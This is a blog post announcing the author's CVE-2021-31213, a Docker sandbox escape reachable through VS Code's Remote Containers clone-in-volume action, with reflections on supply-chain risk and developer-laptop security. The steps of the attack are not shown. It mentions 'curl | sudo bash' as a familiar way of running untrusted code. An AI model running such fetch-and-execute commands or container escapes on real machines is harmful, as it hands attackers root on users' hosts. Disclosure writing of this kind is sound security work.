CVE-2021-31213

Paul Hammond, 25 May 2021

Sometimes while I’m working on a project I have a sudden realization that two components aren’t connected the way everyone thinks they are. Often this is just a bug, usually one the team has been chasing for a while. Occasionally it’s a security hole. But I rarely get to write about it because the components are deep inside the infrastructure of a company that pays my wages.

Recently I had this experience while working with Visual Studio Code Remote Containers which resulted in my first public CVE number, so I’m going to take a moment to write about it, remind you that it’s easy to escape a Docker container, and that developer laptops are probably the weakest link in any company’s security.

VS Code has an action called “Remote-Containers: Clone Repository in Container Volume” which automates the process of downloading a codebase, installing all of the dependencies in a Docker container, running that container, and attaching your editor. I found a small problem: it’s possible for code in the the repository to escape the sandbox provided by Docker and get root privileges on the host system.

To do this you need to do two things:

Combine these and someone just clicking on UI elements inside VSCode can find their laptop compromised. After I reported the issue Microsoft added a simple warning before you perform the action, which is about as good a fix as they can do given there are so many possible variations on both halves of this attack.

Even though I’m writing about it and I reported it to Microsoft Security, I don’t think this is a serious bug. Programmers have been downloading untrusted code and running it locally since before I was born and there are much easier ways to convince them to do this than a little known feature of a VS Code extension. curl | sudo bash or ./configure && make && sudo make install are the two obvious variations, but any time you run something like npm install followed by npm start you’re hoping that none of the repositories you just downloaded contain anything malicious.

I also think the style of containerized development environment that Microsoft are building is likely to eventually be more secure than directories on laptops, even if there are problems along the way. Variations on this attack will have to be more advanced to work on a hosted product such as Github Codespaces. The costs of a sandbox escape there are a lot higher, so the development team does more work to avoid them and it’s more likely that centralized intrusion detection will catch an attack in action. And, even if someone did manage to escape, the impact is lower; they'll only have access to a few other projects that happen to be running on the same server, and not access to all of your keys, tokens and every photo you’ve taken in the last few years.

My experience is that developers demand the ability to run anything they want on their computers, even at companies with tightly locked down device management policies. I’m also only aware of maybe a dozen companies where long-lived production credentials never ever touch developer laptops. Given the apparent rise of software supply chain attacks recently, I wonder if both of those should change. Or maybe we’ll keep stumbling along hoping for the best.